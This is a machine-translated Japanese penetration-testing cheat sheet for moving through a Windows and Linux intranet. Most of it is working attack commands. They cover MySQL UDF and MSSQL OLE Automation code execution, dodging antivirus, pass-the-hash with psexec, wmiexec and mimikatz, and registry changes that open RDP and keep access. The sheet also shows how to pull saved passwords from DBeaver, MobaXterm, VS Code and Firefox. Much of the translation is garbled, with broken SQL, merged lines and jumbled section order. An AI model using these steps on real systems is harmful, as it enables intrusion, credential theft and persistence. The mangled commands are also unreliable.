.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
0x00環境
LinuxホストWWW許可ホストは外部ネットワークから出ることができませんフォワードプロキシはセグメントBを使用できませんイントラネット
0x01情報を収集
f-scrack.py redis、esなどを取得します。
PS: Scrack.pyのMSSQLモジュールブラストは不正確です。自分で簡単なものを書くことができます
python scrack.py -h 10.111.1.1-10.111.2.254 -P 3306,5432 -M 200 -T 6
1.redis
多くのキーがあるときはキーを使用しない *
基本情報:マスター、数量、バージョン番号を表示します
スキャンを使用してkeys:スキャン0マッチ *カウント100を表示
タイプ:タイプキーを表示します
ハッシュタイプ: HGETALLキー
2.mysql
Windowsでは、まずプラグインディレクトリ:に書き込むことができるかどうかをテストできます
@@Plugin_dirを選択します。
outfile plugin_dirにhelloを選択してください。次に、MSFに付属のUDFを使用し、最初に16進数に変換してから、プラグインディレクトリ:にエクスポートします
テストを使用します。
@a=concat( ''、0xhex_of_exe);
テーブルゴーストを作成します(data longblob);
ゴースト値に挿入( '');
Ghost Set data=@a;
GhostからDumpfile Dirにデータを選択します。
CREATE FUNCTION SYS_EVAL RETURNS STRING SONAME 'SYS_EVAL.DLL';
ドロップ関数SYS_EVAL; //使用後に削除し、良い習慣を開発し、最初にSYS_EVALを選択します。 sys_execを使用しないようにしてください(クラッシュします)
3.mssql
MSSQLブラストは、動きが比較的大きくなるため、可能な限り背面に配置する必要があります。
MSSQLブラストが成功した後、CLRを使用してアクセス許可を取得することをお勧めします。 `xp_cmdshell`を直接使用すると死に、360はそれを傍受します。
MSSQLのユーザーパスワード、Certutil、およびその他のツールが傍受または警戒されることが知られています。 MSSQLが提供するツールを使用して、ハードディスクに書き込みます。
ここで、ストアドプロシージャ:を開きます
SP_CONFIGURE 'Advanced Optionsを表示'、1;
行く
再構成;
行く
SP_CONFIGURE 'OLE Automation Procedures'、1;
行く
再構成;
mssqlは大きなファイルを書き込みます
たとえば、exeおよびその他のものが最初にhexに変換され、次に:ファイルに書き込まれます
xxd -plain /tmp/test.exe | tr -d '\ n' /tmp/dll.hex
@hexstring varchar(max)を宣言します。
@hexstring='変換後のhexを設定します';
@file varbinary(max)を宣言します。
@file=(select cast( '' as xml).value( 'xs:hexbinary(sql:variable(' @hexstring ')、sql:column(' t.pos ')))'、 '' varbinary(max) ')
from(select searce substring(@hexstring、1、2)の場合、 '0x' 'then 3 else 0 end)as t(pos));
@fileを選択します;
@init intを宣言;
@filepath nvarchar(4000)=n'c: \ 22.exe ';
exec sp_oacreate 'adodb.stream'、@init output; - 作成されたインスタンス
exec sp_oasetproperty @init、 'type'、1;
exec sp_oamethod @init、 'open'; - メソッドを呼び出します
exec sp_oamethod @init、 'write'、null、@file; - メソッドを呼び出します
exec sp_oamethod @init、 'savetofile'、null、 @filepath、2; - メソッドを呼び出します
exec sp_oamethod @init、 'close'; - メソッドを呼び出します
exec sp_oadestroy @init; - リソース
4.MSSQLバックアップ
バックアップデータベースDBを閉じました
Disk='C: \ Windows \ temp \ db.bak'圧縮、init、stats=5;ボリューム圧縮rar.exe a -m0 -v100m c: \ windows \ temp \ db.split c: \ windows \ tasks \ db.bak
c: \\ windows \ temp \\ db.split.rar /var /tmp /
6.pth
wmiwmic /node:192.168.158 /user3:pt007 /password:ADMIN123プロセスコールの作成コールの作成'CMD.EXE /C ipconfigd: \ result.txt 'wmiexec.vbs:を使用することをお勧めします
https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs
cscript C: \ windows \ tasks \ aliwmi.vbs/cmd ip 'c: \ windows \ system32 \ calc.exe'msfuse exploit/windows/smb/psexec
オプションを表示します
RHOST 192.168.81.129を設定します
SMBPASS 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFを設定します
SMBUSER管理者を設定します
オプションを表示します
runmimikatz || Cobalt strikemimikatz.exe特権:Debug 'sekurlsa:pth /domain: /user3360administrator /ntlm:2d20d252a479f485cdf5e171d93985bf /run:cmd.exe '//pass hashpsexecpsecec /accepteula //
sc delete psexesvc
PSEXEC \\ 192.168.1.185 -U PT007 -P Admin123 CMD.Exe
psexec.vbscscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig'リモートコマンド実行scnet seve \\ 192.168.17.138 \ c $ 'admin123' /user:pt007
正味使用
dir \\ 192.168.17.138 \ c $
Test.exe \\ 192.168.17.138 \ c $をコピーします
sc \\ 192.168.17.138 Create test binpath='c: \ test.exe'
sc \\ 192.168.17.138テスト開始
Sc \\ 192.168.17.138 Del Test
Windows :https://xz.aliyun.com/t/5957でCMDをリモートで実行する9つの方法
0x03アクセスは拒否されます
RID 500ではないコンピューターでは、使用されるトークンは、WMI、PSEXEC、またはその他の方法を使用するかどうかにかかわらず、中程度のトークンです。 wmiexecを使用する場合、アクセスが拒否されることが修正されます
ハッシュをrawったとき、レジストリを変更することができ、すべてのローカル管理者グループメンバーが持続の手段としてリモートで接続できるようにします。
Reg add hklm \ software \ microsoft \ windows \ currentversion \ policies \ system /v localaccounttokenfilterpolicy /t reg_dword /d 1 /f ### rdp's pth
クロールハッシュをクラックできない場合、ハッシュを使用してRDPにリモートでログインすると、「制限された管理モード」を有効にするためにログインしているシステムが必要になります。 Windows 7およびWinserver 2008には、2871997と2973351プディングの設置が必要です。
1。 RDPを開始
reg 'hklm \ system \ currentControlset \ control \ターミナルサーバー' /v fdenytsconnections /t reg_dword /d 00000000 /f
reg add 'hkey_local_machine \ system \ currentControlset \ control \ Terminal Server \ Winstations \ rdp-tcp' /v portnumber /t reg_dword /d0x00000d3d /f#ポート3389を聞いてください
3389をオンにします
wmic /namespace: \\ root \ cimv2 \ emerinalservices path win32_terminalservicesetting where(__class!='')call setallowtsconnections 1
2。制限付き管理モードをオンにします
reg reg add 'hklm \ system \ currentControlset \ control \ lsa' /v disable-sustricedadmin /t reg_dword /d 00000000 /f 010-10 #### dbeaver
dbeaver6構成ファイル(ストレージの場所と復号化方法は、バージョンによって異なります):
#PassWord暗号化されたストレージ場所:
c: \ users \ user \ appdata \ roaming \ dbeaverdata \ workspace6 \ general \ .dbeaver \ curdentiences-config.json
#URLおよびユーザー名:
c: \ uses \ user \ appdata \ roaming \ dbeaverdata \ workspace6 \ general \ .dbeaver \ data-sources.json Decryption script:https://gist.github.com/felipou/50b60309f9f9b70b1e28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd28fd8e
資格情報をダウンロードした後、pythonを使用して:python decrypt.py credentivelys-config.jsonを復号化し、次に、復号化されたIDに基づいて、Data-Sources.jsonの対応するIPとユーザー名を検索します。
パスワードの古いバージョンは、C: \ users \ users \ .dbeaver4 \ general \ .dbeaver-data-source.xmlに保存されています。http://DBEAVER-PASSWORD-DECRYPTER.S3-WEBSITE-US-WEST-2.AMAZONAWS.COM/を使用して、オンライン復号化を直接使用できます。
3。ファイアウォールルールを追加
対応するIP情報とプライベートキーアドレスを備えた.iniファイルがあります
ストレージの古いバージョン: C: \ users%username%\ appdata \ roaming \ mobaxterm
2020バージョン: c: \ users%username%\ documents \ mobaxterm
0x04ダンプパスワード
Windowsの下の構成ファイルはこの場所にあります:
%appdata%\ code \ user \ settings.jsonは、構成ファイルに基づいてメモやSSHなどのストレージ場所を見つけることができます
0x05 MOBAXTEM
マスターサンハオはそれをとても言った、私はfirepwd.py:を使用することを選んだ
Firefox構成ファイルディレクトリ:
%AppData%\ Mozilla \ firefox \ profiles \